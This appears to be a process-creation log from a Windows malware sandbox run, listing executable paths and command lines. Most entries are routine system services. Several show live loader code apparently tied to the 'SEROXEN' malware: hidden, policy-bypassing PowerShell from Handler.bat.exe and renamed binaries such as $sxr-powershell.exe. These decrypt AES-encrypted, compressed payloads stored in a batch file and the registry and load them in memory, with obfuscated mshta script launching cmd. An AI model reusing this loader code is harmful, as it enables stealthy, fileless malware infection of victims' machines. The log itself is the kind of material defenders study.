C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{6c1e8ae1-059a-4079-9d9a-8b3ac6a37e20}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{dde15a65-4832-4c21-b873-b8380cde8204}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{af284ebf-c17d-416a-89fe-4d4c69dab533}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{e6d23945-1aac-40fc-8343-6399bdcfaaef}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{95d8d05e-daed-48bd-acd6-088194a59e27}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{2badb970-0ee3-4b27-a94d-a01e540c4995}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{f076ceda-59a0-4b89-b6f7-0bb03581a885}

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{5d4c1b37-9138-4495-8ae4-d154870b7857}

